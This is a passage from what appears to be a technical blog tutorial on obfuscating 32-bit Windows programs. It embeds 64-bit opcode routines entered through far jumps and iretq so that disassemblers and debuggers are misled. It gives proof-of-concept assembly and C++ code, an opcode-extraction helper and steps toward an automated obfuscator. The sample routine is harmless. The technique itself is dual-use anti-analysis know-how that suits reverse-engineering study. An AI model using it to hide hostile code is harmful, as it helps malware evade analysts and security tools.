<div style="text-align: justify;">
<br /></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 48 03 D2</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">can be:</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - 64bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add rdx, rdx</span></div>
<div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - 32bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> dec eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add edx, edx</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">so you can call the same opcodes and have them behave differently. Or, even worse, you can add JMP instructions in your code from both 32bit and 64bit to the same opcodes, but only one of them is really executed at runtime, for example:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401050h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020 jmp 401050h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 48 03 D2 ???</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">it becomes difficult to understand which of the two jumps is actually going to be executed at runtime, this is particularly annoying if you are trying to write a tool that automatically finds 64bit code snippets and disassembles them for you. In this case, if the tool blindly disassembles the line 0x00401050, then maybe the real code executed it only in 32bit mode from line 0x00401020, etc.</span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">5 - Tools</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Compilers are not designed to handle this situation either! So developing this trick is not straight forward. Compilers, like debuggers and disassemblers, are designed to handle ONE architecture at a time. Mixing 32bit and 64bit is not easy, but it is not too difficult to write tools or plugins that can generate 64bit snippets to be embedded inside a 32bit executable. You can for example use the "<i>__emit</i>" compiler intrinsic available in old Visual Studio versions, or you can use NASM or other assemblers to generate both 32bit and 64bit code and then merge them in one single executable.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are my proposals to help you implement this kind of obfuscation.</span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif;">5.1 - How to include the obfuscation in a Visual Studio project</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To show you how to implement the obfuscation in your own Visual Studio project, I have crafted a POC that you can easily modify.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have first created a 32bit Visual Studio project called "<i>Asm_C</i>" containing two files: "<i>main.cpp</i>" and "<i>test.asm</i>". "<i>main.cpp</i>" simply executes "<i>run_asm64()</i>", the assembly routine that is located in "<i>test.asm</i>", and demonstrates how this routine modifies the value of the "Key" variable.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In particular, this routine consists of:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">opcodes to jump in 64bit mode;</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the 64bit opcodes corresponding to the assembly code you want to execute (in case, the ones that modify the "Key" variable);</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">opcodes to return in 32bit mode.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is done to bypass the lack of support for the two architectures together: you can't mix 32bit code and 64 bit code in the same project, but you can use the corresponding opcodes instead!</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that I have put the opcodes also for the code to jump to 64bit mode although it's run in 32bit. This is done because MASM does not seem to support far jumps properly.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are the listings:</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">main.cpp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" void run_asm64(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" int Key = 0x10000000;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">using namespace std;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">void main(void)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("Key before 64bit: %08x \n", Key);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>run_asm64();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("Key after 64bit: %08x \n", Key);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">test.asm</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.586</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.MODEL FLAT, C</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.STACK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.DATA</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Extern Key:DWORD</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.CODE ;Indicates the start of a code segment.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">run_asm64 PROC</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 0EAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; jump to enter 64 bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocEnter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 033h, 000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocEnter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>; Add the 64bit opcodes within the two lines</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>; warning: remember to preserve the registers you trash</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>;-----------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 051h, 048h, 0b9h ; push rcx / mov rcx, offset Key</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset Key</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 081h, 001h, 078h, 056h, 034h, 012h, 059h ; add dword ptr [rcx], 012345678h / pop rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>;-----------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 083h, 0ech, 004h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 089h, 004h, 024h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], eax (save eax for later)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 08bh, 0c4h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 02bh<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack segment selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 50h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack pointer (in rax)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h, 046h, 002h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push eflags</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 023h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push code selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocExit<span class="Apple-tab-span" style="white-space: pre;"> </span>; push instruction pointer</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 0cfh<span class="Apple-tab-span" style="white-space: pre;"> </span>; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocExit:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax<span class="Apple-tab-span" style="white-space: pre;"> </span>; restore eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ret</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">run_asm64 ENDP </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">END</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To obtain the 64bit opcodes I've created a 64bit Visual Studio project named "<i>Dummy64</i>" containing two files: "<i>main.cpp</i>" and "<i>dummy.asm</i>".</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">"<i>dummy.asm</i>" contains the 64bit assembly code that we want to compile to obtain the corresponding binary opcodes.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">"<i>main.cpp</i>" loops through all the opcodes of the compiled "DummyAsm" routine and then prints them but, first, it looks for a jump (opcode 0xE9) and skips it. This is done because some compilers (Visual Studio, for instance) use to include a snippet, called "trampoline area", that jumps to the function body: so, basically, this check is meant to skip the trampoline itself.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code also supports a sort of relocation procedure: for example, in this POC, we use the variable "<i>Var1</i>" to refer to the "<i>Key</i>" variable in the "<i>Asm_C</i>" project.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course, you can use the same trick every time you want to employ in your 64bit code something that has been defined in the 32bit code. </span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">main.cpp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" void DummyAsm(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" int Var1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">void main(void) </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>int i, Line;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>unsigned char *Routine = (unsigned char *)DummyAsm;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(Routine[0] == 0xE9) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Routine += *(unsigned long *)(&Routine[1]) + 5;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line = 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(i = 0; ; i++){</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(*(unsigned long *)(&Routine[i]) == 0xAAAAAAAA) {<span class="Apple-tab-span" style="white-space: pre;"> </span>// dummy signature</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>break;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// the address of Var1 from this source will be relocated</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// with the address of Key from the 32bit source</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(*(unsigned long long*)(&Routine[i]) == (unsigned long long)&Var1) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("\n dd offset Key \n dd 0");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>i += 7;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line = -1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>else if(Line % 8 == 0) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("\n db 0%02xh", Routine[i]);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>else {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf(", 0%02xh", Routine[i]);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line++;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">dummy.asm</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.DATA</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Var1 DWORD 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PUBLIC Var1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.CODE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">DummyAsm PROC</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">; write the code within the two lines</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">; warning: remember to preserve the registers you trash</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> push rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> mov rcx, offset Var1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add dword ptr [rcx], 012345678h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> pop rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> db 0AAh, 0AAh, 0AAh, 0AAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; dummy signature</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">DummyAsm ENDP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">END</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To sum up, I'm proposing you the following steps:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">You create a 32bit project ("Asm_C", in this case) containing both the C/C++ files with the 32bit code and the ASM files in which you will put the 64bit routines.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Each 64bit routine must contain proper code to enter/exit in/from the 64bit mode.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Each 64bit routine must be codified as opcodes, using the "Dummy64" project.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">If you want to use a portion of memory that has been previously allocated from the 32bit code (like a variable, an array, a structure and so on..), just use a different one in 64bit and remember to relocate it to the one you are really referring to in 32bit, using the trick we saw in the "Dummy64" project.</span></li>
</ul>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif;">5.2 - How to (nearly) automate the obfuscation</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To automate the obfuscation you can take advantage of Visual Studio itself! In fact, you can use the /FA option in the Visual Studio command line (or from "Project Properties -> Configuration properties -> C/C++ -> Output files -> Assembler output -> Assembly-Only Listing") and then /GL option (or from "Project properties -> Configuration properties -> C/C++ -> Optimization -> Whole Program Optimization") </span><span style="font-family: Verdana, sans-serif;">to obtain the assembly sources related to your project without optimizations</span><span style="font-family: Verdana, sans-serif;">. Finally you can compile and link the obtained assembly files by typing: "ml file_1.asm ... file_n.asm" in the Visual Studio command line.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">N.B. The /GL option is crucial, because it tells the compiler not to mix the code between the project files: in this way, if a routine is located in "<i>main.cpp</i>", the corresponding assembly one will be in "<i>main.asm</i>", while without this option, due to optimization, it could be located in any other generated assembly file and the ML command won't work!</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">So you can:</span></div>
</div>
<div>
<ol>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Create a 32bit Visual Studio C/C++ project and compile it in the way described above.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Select any instruction from the obtained assembly listing and substitute it with a bunch of opcodes in 64bit mode that have the same behavior, taking care of adding the code to jump in and out 64bit.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Compile and link the assembly files.</span></li>
</ol>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course, you can automate step 2 very easily and craft your own obfuscator: it won't take long if you use any programming language that supports regular expressions.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">For example, I followed these steps and substituted the assembly instruction "push 14h" with the following assembly code:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 0EAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; jump to enter 64 bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocEnter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 033h, 000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocEnter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">db 048h, 083h, 0ech, 004h, 0c7h, 004h, 024h, 014h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">db 000h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], 14h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 083h, 0ech, 004h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 089h, 004h, 024h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 08bh, 0c4h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 02bh<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack segment selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 50h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack pointer (in rax)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h, 046h, 002h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push eflags</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 023h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push code selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocExit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 0cfh<span class="Apple-tab-span" style="white-space: pre;"> </span>; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocExit:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I then linked the assembly files and it worked just fine. Moreover I've decompiled the executable you obtain before and after that modification, here are the listings.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Before the modification:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401018 push offset aMain_txt</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D call FileCreate</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 push 14h ; the instruction we're going to replace</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024 push offset aTestTest</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 push 0 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102B push eax </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C mov hObject, eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401031 call FileSeekWrite</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">After the modification:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401018 push offset aMain_txt ; "main.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D call FileCreate</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 jmp far ptr 33h:401029h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 _main endp ; sp-analysis failed</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 ; ---------------------------------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 db 48h, 83h, 0ECh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C dd 2404C704h, 14h, 4EC8348h, 48240489h, 2B6AC48Bh, 2466850h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C dd 236A0000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401048 db 68h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401049 dd offset loc_40104F</span></div>
